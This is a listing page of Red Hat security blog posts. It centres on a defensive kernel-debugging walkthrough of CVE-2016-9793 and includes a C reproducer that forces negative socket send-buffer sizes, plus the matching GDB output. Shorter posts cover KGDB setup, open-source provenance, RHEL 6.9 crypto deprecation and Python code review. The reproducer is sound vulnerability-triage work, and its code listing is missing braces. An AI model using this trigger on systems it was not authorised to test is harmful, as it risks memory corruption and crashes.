Warning message

Log in to add comments.

Latest Posts

  • Debugging a kernel in QEMU/libvirt - Part II

    Authored by: Wade Mealing

    This blog has previously shown how to configure a Red Hat Enterprise Linux system for kernel debugging, it expects that the system has been configured, have the source code matching the installed kernel version handy, and the reader is ready to follow along.

    This should not be running on a productions system as system function interruption is guaranteed.

    The particular problem that will be investigated is CVE-2016-9793. As discussed on the Oss-security list, this vulnerability was classified as an integer overflow, which must be addressed.

    Eric Dumazet describes the patch as (taken from the commit that attempts to fix the flaw):

    $ git show b98b0bc8c431e3ceb4b26b0dfc8db509518fb290
    commit b98b0bc8c431e3ceb4b26b0dfc8db509518fb290
    Author: Eric Dumazet <edumazet@google.com>
    Date:   Fri Dec 2 09:44:53 2016 -0800
        net: avoid signed overflows for SO_{SND|RCV}BUFFORCE
        CAP_NET_ADMIN users should not be allowed to set negative
        sk_sndbuf or sk_rcvbuf values, as it can lead to various memory
        corruptions, crashes, OOM...
        Note that before commit 82981930125a ("net: cleanups in
        sock_setsockopt()"), the bug was even more serious, since SO_SNDBUF
        and SO_RCVBUF were vulnerable.
        This needs to be backported to all known linux kernels.
        Again, many thanks to syzkaller team for discovering this gem.
        Signed-off-by: Eric Dumazet <edumazet@google.com>
        Reported-by: Andrey Konovalov <andreyknvl@google.com>
        Signed-off-by: David S.  Miller <davem@davemloft.net>
    diff --git a/net/core/sock.c b/net/core/sock.c
    index 5e3ca41..00a074d 100644
    --- a/net/core/sock.c
    +++ b/net/core/sock.c
    @@ -715,7 +715,7 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
                    val = min_t(u32, val, sysctl_wmem_max);
                    sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
    -               sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
    +               sk->sk_sndbuf = max_t(int, val * 2, SOCK_MIN_SNDBUF);
                    /* Wake up sending tasks if we upped the value.  */
    @@ -751,7 +751,7 @@ set_rcvbuf:
                     * returning the value we actually used in getsockopt
                     * is the most desirable behavior.
    -               sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
    +               sk->sk_rcvbuf = max_t(int, val * 2, SOCK_MIN_RCVBUF);
            case SO_RCVBUFFORCE:

    The purpose of the investigation is to determine if this flaw affects the shipped kernels.

    User interaction with the kernel happen through syscalls and ioctls. In this case, the issue is the setsockopt syscall. This specific call ends up being handled in a function named sock_setsockopt as shown in the patch.
    The flaw is not always clearly documented in patches, but in this case the area that the patch modifies is an ideal place to start looking.

    Investigating sock_setsockopt function

    The sock_setsockopt code shown below has the relevant parts highlighted in an attempt to explain key concepts that complicate the investigation of this flaw.

    A capabilities check is the first step that must be overcome when attempting to force set the snd_buff size. Inspecting the function sock_setsockopt code, a capable() check enforces the process has CAP_NET_ADMIN privilege to force buffer sizes. The attack vector is reduced by requiring this capability but not entirely mitigated. The root user by default has these capabilities, and it can be granted to binaries that run by other users. The relevant section of code is:

             if (!capable(CAP_NET_ADMIN)) {
                 ret = -EPERM;

    The reproducer would need to have CAP_NET_ADMIN capabilities/permissions to run setsockopt() with the SO_RCVBUFFORCE parameter. To read more about Linux kernel capabilities checkout the setcap (8) man page and the capabilities (7) man page.

    We can see from the patch and surrounding discussion that it is possible to set the size of sk->sndbuf to be negative. Following the flow of code, it would then enter the max_t macro before being assigned. The patch explicitly changes the max_t macros type to be cast.

    Using the GDB debugger and setting a breakpoint will show how various sizes values affect the final value of sk->sndbuf.

    Integer overflows

    The patch shows that the type used in the max_t macro compare was changed from u32 (unsigned 32 bit integer) to int (signed 32 bit integer). Before we make assumptions or do any kind of investigation, we can make a hypothesis that the problem exists with the outcome of the max_t.

    Here is the definition of max_t:

    #define max_t(type, x, y) ({            \
        type __max1 = (x);            \
        type __max2 = (y);            \
        __max1 > __max2 ? __max1: __max2; })

    My understanding of the max_t macro is that it would cast both the second and third parameters to the type specified by the first parameter returning __max1 if __max1 was greater than __max2. The unintended side affect would be that when casting to an unsigned type the comparison would turn negative values into large integer values.

    It may be tempting to program the relevant macro, type definitions, and operations on the variables into a small C program to test. Resist! Armed with your kernel debugging knowledge and a small C program to exercise the code, we can see how the tool-chain decided to create this code.

    For the test case, we'll need to consider using values that will test how the compiler and architecture deals with these kind of overflows. Input that would could create overflows or final negative values should be used as test cases.

    Building the test case

    To exercise this particular section of code (before the patch) we can build a small reproducer in C. Feel free to choose a language and write your test code in which you can set the socket options with the same way.

    #include <stdio.h>
    #include <limits.h>
    #include <linux/types.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <stdio.h>
    #include <error.h>
    #include <errno.h>
    #include <string.h>
    int main(int argc, char **argv)
        int sockfd, sendbuff;
        socklen_t optlen;
        int res = 0;
        int i = 0;
        /* Boundary values used to test our hypothesis */
            int val[] = {INT_MIN , INT_MIN + 100, INT_MIN + 200, -200 , 0 , 200 , INT_MAX - 200, INT_MAX - 100, INT_MAX};
        sockfd = socket(AF_INET, SOCK_DGRAM, 0);
        if(sockfd == -1) {
             printf("Error: %s", strerror(errno));
        for (i = 0 ; i < 7; i++ ) {
            sendbuff = (val[i] / 2.0);
            printf("== Setting the send buffer to %d\n", sendbuff);
            if (setsockopt(sockfd, SOL_SOCKET, SO_SNDBUFFORCE, &sendbuff, sizeof(sendbuff)) == -1) {
              printf("SETSOCKOPT ERROR: %s\n", strerror(errno));
            if (getsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, &sendbuff, &optlen) == -1) {
              printf("GETSOCKOPT ERROR: %s\n", strerror(errno));
            else {
              printf("getsockopt returns buffer size: %d\n", sendbuff);
     return 0;

    Compile the reproducer:

    [user@target /tmp/]# gcc setsockopt-integer-overflow-ver-001.c -o setsockopt-reproducer

    And set the capability of CAP_NET_ADMIN on the binary:

    [user@target /tmp/]# setcap CAP_NET_ADMIN+ep setsockopt-reproducer

    If there are exploit creators (or flaw reporters) in the audience, understand that naming your files as reproducer.c and reproducer.py ends up getting confusing, please attempt to create a unique name for files. This can save time when searching through the 200 reproducer.c laying around the file system.

    Saving time

    Virtual machines afford programmers the ability to save the system state for immediate restore. This allows the system to return to a "known good state" if it was to panic or become corrupted. Libvirt calls this kind of snapshot a "System Checkpoint" style snapshot.

    The virt-manager GUI tool in Red Hat Enterprise Linux 7 did not support creating system checkpoints in the GUI. The command line interface is able to create system-checkpoint snapshots by:

    # virsh snapshot-create-as RHEL-7.2-SERVER snapshot-name-1

    To restore the system to the snapshot run run the command:

    # virsh snapshot-revert RHEL-7.2-SERVER snapshot-name-1

    If the system is running Fedora 20 or newer, and you prefer to use GUI tools, Cole Robinson has written an article which shows how to create system checkpoint style snapshots from within the virt-manager.

    The advantage of snapshots is that you can restore your system back to a working state in case of file system corruption, which can otherwise force you to reinstall from scratch.

    Debugging and inspecting

    GDB contains a "Text User Interface" mode which allows for greater insights into the running code. Start GDB in the "Text User Interface Mode" and connect to the running qemu/kernel using gdb as shown below:

    gdb -tui ~/kernel-debug/var/lib/kernel-3.10.0-327.el7/boot/vmlinux
    <gdb prelude here>
    (gdb) dir ./usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/
    (gdb) set architecture i386:x86-64:intel
    (gdb) set disassembly-flavor intel
    (gdb) target remote localhost:1234

    The extra line beginning with dir points GDB to the location of the source used in creating the binary. This allows GDB to show the current line of execution. This directory tree was created when extracting the kernel-debuginfo-package using rpm2cpio.

    GDB should appear similar to the below screenshot:

    The TUI mode will show the source code at the top and the command line interactive session at the bottom window. The TUI can be customized further and this is left as an exercise to the reader.

    Inspecting the value

    The plan was to inspect the value at the time of writing to the sk->sk_sndbuf to determine how different parameters would affect the final value.

    We will set a breakpoint in GDB to stop at that position and print out the value of sk->sk_sndbuf.

            sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
    >>>>>>>>sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);  
            /* Wake up sending tasks if we upped the value.  */
        case SO_SNDBUFFORCE:
            if (!capable(CAP_NET_ADMIN)) {
                ret = -EPERM;
            goto set_sndbuf;

    The line which assigns the sk->snd_buf value is line 704 in net/core/sock.c. To set a breakpoint on this line we can issue the "break" command to gdb with the parameters of where it should break.

    Additional commands have been appended that will run every time the breakpoint has been hit. In this demonstration the breakpoint will print the value of sk->sk_sndbuf and resume running.

    If you are not seeing the (gdb) prompt, hit ctrl + c to interrupt the system; pausing the system. While the system is suspended in gdb mode it will not take keyboard input or continue any processing.

    (gdb) break net/core/sock.c:703
    Breakpoint 1 at 0xffffffff81516ede: file net/core/sock.c, line 703.
    (gdb) commands
    Type commands for breakpoint(s) 4, one per line.
    End with a line saying just "end".
    >p sk->sk_sndbuf

    The "command" directive is similar to a function that will be run each time the most recently set breakpoint is run. The 'continue' directive at the (gdb) prompt to resume processing on the target system.

    The plan was to show a binary compare of val to inspect the comparison, however this value was optimized out. GCC would allow us to inspect the 'val' directly if we were to step through the assembly and inspect the registers at the time of comparison. Doing so, however, is beyond the scope of this document.

    Lets give it a simple test running the reproducer against the code with a predictable, commonly used value. Start another terminal, connect to the target node and run the command:

    [user@target]# ./setsockopt-reproducer 
    Setting the send buffer to -1073741824
    getsockopt buffer size: -2147483648
    Setting the send buffer to -1073741774
    getsockopt buffer size: -2147483548
    Setting the send buffer to -1073741724
    getsockopt buffer size: -2147483448
    Setting the send buffer to -100
    getsockopt buffer size: -200
    Setting the send buffer to 0
    getsockopt buffer size: 4608
    Setting the send buffer to 100
    getsockopt buffer size: 4608
    Setting the send buffer to 1073741723
    getsockopt buffer size: 2147483446
    Setting the send buffer to 1073741773
    getsockopt buffer size: 2147483546

    At this time there should be a breakpoint showing as executed in the gdb terminal printing out the value every time the function passes net/core/sock.c line 704.

    Breakpoint 4, sock_setsockopt (sock=sock@entry=0xffff88003c57b680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffce597f1a0 "",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $9 = 212992

    The above example shows $? = ______ as the output of the command that we have created. Each dollar ($N) shown in output correspond to the values iterated through in the test-case code.

    int val[] = {INT_MIN , INT_MIN + 1, -1 , 0 , 1 , INT_MAX - 1, INT_MAX};

    Listed below is the complete output of the example script:

    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $1 = 212992
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "2",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $2 = -2147483648
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "d",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $3 = -2147483548
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>,
        optval@entry=0x7ffe3ea373c4 "\234\377\377\377\003", optlen=optlen@entry=4) at net/core/sock.c:704
    $4 = -2147483448
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $5 = -200
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "d",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $6 = 4608
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "\233\377\377?\003",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $7 = 4608
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "\315\377\377?\003",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $8 = 2147483446


    As we can see, the final values of sk->sk_sndbuf can be below zero if an application manages to set the value incorrectly. There are many areas of the kernel that use sk->sndbuf where the most obvious of places is the tcp_sndbuf_expand function. This value is used and memory is allocated based on this size.

    This is going to be marked as vulnerable in EL7. I leave this as an exercise for the reader to do their own confirmation on other exploits they may be interested in.


    Listed below are a number of problems that first time users have run into. Please leave problems in the comments and I may edit this article to aid others in finding the solution faster.

    Problem: Can't connect to gdb?
    Solution: Use netstat to check the port is open and listening on the host. Add a rule in the firewall to allow incoming connections to this port.

    Problem: GDB doesn't allow me to type?
    Solution: Hit Ctrl + C to interrupt the current system, enter your command, type 'continue' to resume the hosts execution.

    Problem: Breakpoint is set, but it never gets hit?
    Solution: Its likely that you have a booted kernel and source code mismatch, check to see the running kernel matches the source code/line number that has been set.

    Problem: The ssh connection drops while running the code!
    Solution: If the target system remains in gdbs interrupted mode for too long networked connections to the system can be dropped. Try and connect to the host via "virsh console SOMENAME" to get a non-networked console. You may need to setup a serial console on the host if one is not present.

    Additional thanks to:
    - Doran Moppert (GDB assistance!)
    - Prasad Pandit (Editing)
    - Fabio Olive Leite (Editing)

    Posted: 2017-02-24T14:30:00+00:00
  • Do you know where that open source came from?

    Authored by: Joshua Bressers

    Last year, while speaking at RSA, a reporter asked me about container provenance. This wasn’t the easiest question to answer because there is a lot of nuance around containers and what’s inside them. In response, I asked him if he would eat a sandwich he found on the ground. The look of disgust I got was priceless, but it opened up a great conversation.

    Think about it this way: If there was a ham sandwich on the ground that looked mostly OK, would you eat it? You can clearly see it’s a ham sandwich. The dirt all brushed off. You do prefer wheat bread to white. So what’s stopping you? It was on the ground. Unless you’re incredibly hungry and without any resources, you won’t eat that sandwich. You’ll visit the sandwich shop across the street.

    The other side of this story is just as important though. If you are starving and without money, you’d eat that sandwich without a second thought. I certainly would. Starving to death is far worse than eating a sandwich of questionable origin. This is an example you have to remember in the context of your projects and infrastructure. If you have a team that is starving for time, they aren’t worried about where they get their solutions. For many, making the deadline is far more important than “doing it right.” They will eat the sandwich they find.

    This year at RSA, I’m leading a Peer2Peer session titled, “Managing your open source.” I keep telling everyone that open source won. It’s used everywhere; there’s no way to escape it anymore. But a low-cost, flexible, and more secure software option must have some kind of hidden downside, right? Is the promise of open source too good to be true? Only if you don’t understand the open source supply chain.

    Open source is everywhere, and that means it’s easily acquirable. From cloning off of github to copying random open source binaries downloaded from a project page, there’s no stopping this sort of behavior. If you try, you will fail. Open source won because it solves real problems and it snuck in the back door when nobody was looking. It’s no secret how useful open source is: by my guesstimates, the world has probably saved trillions in man hours and actual money thanks to all the projects that can be reused. If you try to stop it now it’s either going to go back underground, making the problem of managing your open source usage worse or, worse still, you’re going to have a revolt. Open source is amazing, but there is a price for all this awesome.

    Fundamentally, this is our challenge: How do we empower our teams to make the right choices when choosing open source software?

    We know they’re going to use it. We can’t control every aspect of its use, but we can influence its direction. Anyone who is sensitive to technical debt will understand that open source isn’t a “copy once and forget” solution. It takes care and attention to ensure that you haven’t just re-added Heartbleed to your infrastructure. Corporate IT teams need to learn how to be the sandwich shop - how do we ensure that everyone is coming to us for advice and help with open source instead of running whatever they find on the ground? There aren’t easy answers to all of these questions, but we can at least start the discussion.

    In my RSA Peer2Peer session we’re going to discuss what this all means in the modern enterprise:
    - How are you managing your open source?
    - Are you doing nothing?
    - Do you have a program where you vet the open source used to ensure a certain level of quality?
    - How do you determine quality?
    - Are you running a scanner that looks for security flaws?
    - What about the containers or Linux distribution you use, where did that come from, who is taking care of it?
    - How are you installing your open source applications on your Linux or even Windows servers?

    There are a lot of questions, too many to ask in a single hour or day, and far too many to effectively answer over the course of a career in IT security. That’s okay though; we want to start a discussion that I expect will never end.

    See you at RSA on Tuesday February 14, 2017 | 3:45 PM - 4:30 PM | Marriott Marquis | Nob Hill C

    Posted: 2017-02-08T14:30:00+00:00
  • Debugging a kernel in QEMU/libvirt

    Authored by: Wade Mealing

    A kernel bug announced on oss-security list claims to create a situation in which memory corruption can panic the system, by causing an integer used in determining the size of TCP send and receive buffers to be a negative value. Red Hat engineering sometimes backports security fixes and features from the current kernel, diverging the Red Hat Enterprise Linux kernel from upstream and causing some security issues to no longer apply. This blog post shows how to use live kernel debugging to determine if a system is at risk by this integer overflow flaw.

    This walkthrough assumes that the reader has a Red Hat Enterprise Linux 7 guest system and basic knowledge of C programming.

    Setting up the guest target to debug

    The guest to be the target of the debugging session is a libvirt (or KVM/QEMU) style Virtual Machine. The guest virtual serial port should be mapped to the TCP port (TCP/1234) for use by GDB (the GNU Debugger).

    Modifying the guest domain file

    The virsh-edit command is intended to be a safe method of manipulating the raw XML that describes the guest, which is what we need to do in this circumstance. We need to configure the guest via the domain configuration file as there is no tickbox to enable what we need in virt-manager.

    The first change is to set the XML namespace for QEMU, which sounds more complex than it is.

    # virsh-edit your-virt-host-name

    Find the domain directive and add the option xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'.

    <domain type='kvm'
            xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0' >

    Add a new qemu:commandline tag inside domain which will allow us to pass a parameter to QEMU for this guest when starting.

    <domain type='kvm'
           xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0' >
              <qemu:arg value='-s'/>

    Save the file and exit the editor. Some versions of libvirt may complain that the XML has invalid attributes; ignore this and save the file anyway. The libvirtd daemon does not need to be restarted. The guest will need to be destroyed and restarted if it is already running.

    The -s parameter is an abbreviation of -gdb tcp::1234. If you have many guests needing debugging on different ports, or already have a service running on port 1234 on the host, you can set the port in the domain XML file as shown below:

            <qemu:arg value='-gdb'/>
            <qemu:arg value='tcp::1235'/>

    If it is working, the QEMU process on the host will be listening on the port specified as shown below:

    [root@target]# netstat -tapn | grep 1234
    tcp        0      0  *               LISTEN      11950/qemu-system-x
    Change /etc/default/grub on the guest

    The guest kernel will need to be booted with new parameters to enable KGDB debugging facilities. Add the values kgdboc=ttyS0,115200. In the system shown here, a serial console is also running on ttyS0 with no adverse effects.

    Use the helpful grubby utility to apply these changes across all kernels.

    # grubby --update-kernel=ALL --args="console=ttyS0,115200 kgdboc=ttyS0,115200"
    Downloading debuginfo packages

    The Red Hat Enterprise Linux kernel packages do not include debug symbols, as the symbols are stripped from binary files at build time. GDB needs those debug symbols to assist programmers when debugging. For more information on debuginfo see this segment of the Red Hat Enteprise Linux 7 developer guide.

    RPM packages containing the name 'debuginfo' contain files with symbols. These packages can be downloaded from Red Hat using yum or up2date.

    To download these packages on the guest:

    # debuginfo-install --downloadonly kernel-3.10.0-327.el7

    This should download two files in the current directory on the host for later extraction and use by GDB.

    Copy these files from the guest to the host for the host GDB to use them. I choose ~/kernel-debug/ as a sane location for these files. Create the directory if it doesn't already exist.

    # mkdir -p ~/kernel-debug
    # scp yourlogin@guest:kernel*.rpm ~/kernel-debug/

    The final step on the guest is to reboot the target. At this point the system should reboot with no change in behavior.

    Preparing the host to debug

    The system which runs the debugger doesn't need to be the host that contains the guest. The debugger system must be capable of making a connection to the guest running on the specified port (1234). In this example these commands will be run on the host which contains the virtual machine.

    Installing GDB

    Install GDB on the host using a package manager.

    # sudo yum -y install gdb
    Extracting files to be used from RPMs

    When Red Hat builds the kernel it strips debugging symbols from the RPMs. This creates smaller downloads and uses less memory when running. The stripped packages are the well-known RPM packages named like kernel-3.10.0-327.el7.x86_64.rpm. The non-stripped debug information is stored in debuginfo rpms, like the ones downloaded earlier in this document by using debuginfo-install. They must match the exact kernel version and architecture being debugged on the guest to be of any use.

    The target does not need to match the host system architecture or release version. The example below can extract files from RPMs on any system.

    # cd ~/kernel-debug
    # rpm2cpio kernel-debuginfo-3.10.0-327.el7.x86_64.rpm | cpio -idmv
    # rpm2cpio kernel-debuginfo-common-3.10.0-327.el7.x86_64.rpm | cpio -idmv

    This extracts the files within the packages into the current working directory as they would be on the intended file system. No scripts or commands within the RPMs are ran. These files are not installed and the system package management tools will not manage them. This allows them to be used on other architectures, releases or distributions.

    • The unstripped kernel is the vmlinux file in ~/kernel-debug/usr/lib/debug/lib/modules/3.10.0-510.el7.x86_64/vmlinux
    • The kernel source is in the directory ~/kernel-debug/usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/
    Connecting to the target system from the remote system

    Start GDB with the text user interface, passing as a parameter the path to the unstripped kernel binary (vmlinux) running on the target system.

    # gdb -tui ~/kernel-debug/var/lib/kernel-3.10.0-327.el7/boot/vmlinux
    <gdb prelude shows here>

    GDB must be told where to find the target system. Type the following into the GDB session:

    set architecture i386:x86-64:intel
    target remote localhost:1234
    dir ~/kernel-debug/usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/

    Commands entered at the (gdb) prompt can be saved in ~/.gdbinit to reduce repetitive entry.

    At this point, if all goes well, the system should be connected to the remote GDB session.

    The story so far...

    Congratulations, you've made it this far. If you've been following along you should have setup a GDB session to a system running in libvirt and be able to recreate and begin investigation into flaws.

    Join the dark side as next time when we validate an integer promotion comparison flaw.

    Posted: 2017-01-11T14:30:00+00:00
  • Deprecation of Insecure Algorithms and Protocols in RHEL 6.9

    Authored by: Nikos Mavrogian...

    Cryptographic protocols and algorithms have a limited lifetime—much like everything else in technology. Algorithms that provide cryptographic hashes and encryption as well as cryptographic protocols have a lifetime after which they are considered either too risky to use or plain insecure. In this post, we will describe the changes planned for the 6.9 release of Red Hat Enterprise Linux 6, which is already on Production Phase 2.

    Balancing Legacy Use Cases and Modern Threats

    For the RHEL operating system, which has its useful lifetime measured in decades, in addition to adding new features, it is necessary to periodically revisit default settings and phase out (or completely deprecate) protocols and algorithms the use of which—accidental or intentional—could cause irreparable damage. At the same time we must ensure that the vast majority of existing and legacy applications continues to operate without changes, as well as provide mechanisms for the administrator to revert any changes, when necessary, to the previous defaults.

    What Are the Threats?

    Given that any change in application or library default settings cannot be without side-effects, it is important to provide the context under which such changes are necessary. In the past few years, we’ve identified several protocol attacks with real-world impact that relied on obsolete and legacy algorithm and protocol configurations. A few prominent attacks are briefly described below:

    • DROWN in 2016; it relied on servers enabling the SSL 2.0 protocol, allowing the attackers to obtain sufficient information to decrypt other, unrelated TLS sessions.
    • SLOTH in 2016; it relied on clients enabling the MD5 algorithm, broken since 2004; it allowed attackers to decrypt TLS sessions.
    • LOGJAM and FREAK in 2015. While the details of the attacks differ, both of these attacks relied on export cryptography being enabled in the server, allowing an attacker to decrypt TLS sessions.

    Why Would Insecure Configuration Remain Enabled?

    While all of the exploited protocols and algorithms were known to be obsolete or insecure for more than a decade, the impact of these attacks was still high. That indicates that these obsolete protocols and algorithms were enabled on Internet servers possibly due to:

    • misconfiguration,
    • administrators’ hope of improving compatibility with legacy clients,
    • re-use of old configuration files.

    Traditionally, we have not been very keen on deprecating algorithms and protocols throughout the RHEL timeline to avoid breaking existing and legacy applications. This was because of our belief that for an operating system, keeping operations going on is more important than addressing flaws that may not be applicable on every operating system setup.

    Solution for RHEL 6.9

    However, after considering these attacks and the fact that it is unrealistic to expect all administrators to keep up with cryptographic advances, we have decided to provide a protection net, which will prevent future cryptographic attacks due to accidental misconfiguration with legacy algorithms and protocols in default RHEL 6.9 installations.

    No Export Ciphersuites and SSL 2.0

    In particular, we will take steps that will ensure that the TLS ciphersuites marked as export, as well as the SSL 2.0 protocol, are completely removed from the operating system. These two points involve algorithms with no real-world use and a protocol that has been considered deprecated for more than 20 years. We will not provide a way to re-enable these options because we are convinced that these are primarily used to attack misconfigured systems rather than for real-world use cases.

    Limited MD5, RC4, and DH

    In addition, we will ensure that no application can be used with insecure signature-verification algorithms such as MD5, and that TLS client applications refuse to communicate with servers that advertise less than 1024-bit Diffie-Hellman parameters. The latter would ensure that LOGJAM-style of attacks are prevented. Furthermore, we will disable the usage of RC4 in contexts where this will not introduce compatibility issues.

    All-around Application Support for TLS 1.2

    While deprecating insecure algorithms and protocols protects applications running in RHEL from future attacks taking advantage of them, it is also important, given that RHEL 6.9 entered Production Phase 2, to provide a solid cryptographic base for the remaining lifetime of the product. For that we will ensure that all the back-end cryptographic components support TLS 1.2, allowing new applications to be deployed and used during its lifetime.

    Summary of Changes to Cryptographic Back-ends in RHEL 6.9

    Introduced change Description Revertable
    TLS 1.2 protocol The protocol is made available to all shipped cryptographic libraries and enabled by default. N/A
    SSL 2.0 protocol The shipped TLS libraries will no longer include support for the SSL 2.0 protocol. No
    Export TLS ciphersuites The shipped TLS libraries will no longer include support for Export TLS ciphersuites. No
    TLS Diffie-Hellman key exchange Only parameters larger than 1024-bits will be accepted by default.1 Yes. Administrators can revert this setting system-wide (information will provided in the release notes).
    MD5 algorithm for digital signatures The algorithm will not be enabled by default for TLS sessions or certificate verification on any of the TLS libraries we ship. Yes. Administrators can revert this setting system-wide (information will provided in the release notes).
    RC4 algorithm The algorithm will no longer be enabled by default for OpenSSH sessions. Yes. Administrators can revert this setting system-wide (information will provided in the release notes).

    1. This, exceptionally, applies only to OpenSSL, GnuTLS, and NSS cryptographic back-ends, not to Java/OpenJDK. 

    Posted: 2017-01-03T14:30:00+00:00
  • Pythonic code review

    Authored by: Ilya Etingof

    Most of us programmers go through technical interviews every once in a while. At other times, many of us sit on the opposite side of the table running these interviews. Stakes are high, emotions run strong, intellectual pressure builds up. I have found that an unfortunate code review may turn into something similar to a harsh job interview.

    While it is theoretically in the best interest of the whole team to end up with high quality code, variations in individual's technical background, cultural differences, preconceptions built up on previous experience, personality quirks, and even temper may lure people into a fierce fight over relatively unimportant matters.

    Consider an imaginary pull request. There we typically have two actors: the author and code reviewers. Sometimes authors tend to overestimate the quality of their code which provokes them to be overly defensive and possibly even hostile to any argument. People reviewing the code may find themselves being in a position of power to judge author's work. Once the actors collide over a matter where they take orthogonal and sufficiently strong sides, all is fair in love and war.

    Another interesting phenomena I encountered while reviewing Python code can probably be attributed to Python's low barrier to entry for newcomers. Programmers switching over from other languages bring along customs and idioms they are used to in their "mother tongue". I can usually figure out from their Python code whether the author is a former Java, Perl, or Bash programmer. As much as I admire other technologies and expertise, I believe it is most efficient and enjoyable to code in harmony with the language rather than stretching it beyond its intended design.

    In this article I'll focus on my personal experience in authoring and reviewing Python code from both psychological and technical perspectives. And I'll do so keeping in mind the ultimate goal of striking a balance between code reviews being enjoyable and technically fruitful.

    Why we review code

    The most immediate purpose of a code review is to make code better by focusing more eyeballs on it. But code review seems to be a lot more than that!

    It is also a way for the engineers to communicate, learn and even socialize over a meaningful and mutually interesting topic. In a team where both senior and junior engineers work together, a code review provides the opportunity for the junior engineers to observe masters at work and learn from them.

    Seniors, in turn, get a chance to coach fellow engineers, be challenged and thus prove their authority (which is healthy). Everyone can see the problem from different perspectives, which ultimately contributes to a better outcome.

    For mature Pythonistas coding with newbies, code review is a way to teach them how we do things in Python with the goal of creating idiomatic Python coders out of them.

    For the greater good

    The best we can do on the psychological side is to, as an author, relinquish our emotional attachment to our code and, as a reviewer, consciously restrain ourselves from attacking other authors' ideas, focusing instead on mentoring them.

    For a review to be a productive and relatively comfortable experience, a reviewer should stay positive, thankful, honestly praise the author's work and talent in a genuine matter. Suggested changes should be justified by solid technical grounds, and never by the reviewer's personal taste.

    For authors it may help to keep reminding themselves how much time and effort it might have taken for reviewers to work with the author's code -- their feedback is precious!

    As idealistic as it sounds, my approach aims at downplaying my ego by optimizing for a healthier team and an enjoyable job. I suspect that it may come at the cost of compromised quality of the code we collectively produce, but to me that is worth it. My hope here is that even if we do merge sub-optimal code at times, we will eventually learn from that and re-factor later. That's a much cheaper cost compared to ending up with a stressed, despaired and demotivated colleague.

    When I'm an author

    As an author, I'm not taking Pull Requests (PRs) lightly. My day's worth of code is likely to keep fellow reviewers busy for a good couple of hours. I know that it's a hard and expensive endeavor. Proper code review may require my team mates to reverse engineer business logic behind a change, trace code execution, conduct thought experiments, and search for edge cases. I do keep that in mind and feel grateful for their time.

    I try to keep my changes small. The larger the change is, the more effort it would take for reviewers to finish the review. That gives smaller, isolated changes a better chance for quality treatment, while huge and messy blobs of diffs risk turning a blind eye on my PR.

    Well-debugged code accompanied with tests, properly documented changes complying with team policies -- those PR qualities are signs of respect and care towards reviewers. I feel myself more confident once I run a quick self code review against my prospective PR prior to submitting it to fellow engineers.

    When I'm a reviewer

    To me, the most important qualities of code is to be clean and as Pythonic as circumstances permit.

    Clean code tends to be well-structured, where logically distinct parts are isolated from each other via clearly visible boundaries. Ideally, each part is specialized on solving a single problem. As Zen of Python puts it: "If the implementation is easy to explain, it may be a good idea".

    Signs of clear code include self-documented functions and variables describing problem entities, not implementation details.

    Readability counts, indeed, though I would not sweat full PEP8 compliance where it becomes nitpicking and bikesheding.

    I praise the author's coding on the shoulders of giants -- abstracting problems into canonical data structures/algorithms and working from there. That gives me the warm feeling of the author belonging to the same trade guild as myself, and confidence that we both know what to expect from the code.

    When I'm a Pythonista

    The definition of code being Pythonic tends to be somewhat vague and subjective. It seems to be influenced by one's habits, taste, picked up idioms and language evolution. I keep that in mind and restrain myself from evangelizing my personal perception of what's Pythonic towards fellow Pythonistas.

    Speaking from my experience in the field, let me offer the reader a handful of code observations I have encountered, along with suggestions leveraging features that are native to Python of which people with different backgrounds may be unaware.

    Justified programming model

    People coming from Java tend to turn everything into a class. That's probably because Java heavily enforces the OOP paradigm. Python programmers enjoy a freedom of picking a programming model that is best suited for the task.

    The choice of object-based implementations look reasonable to me when there is a clear abstraction for the task being solved. Statefulness and duck-typed objects are another strong reason for going the OOP way.

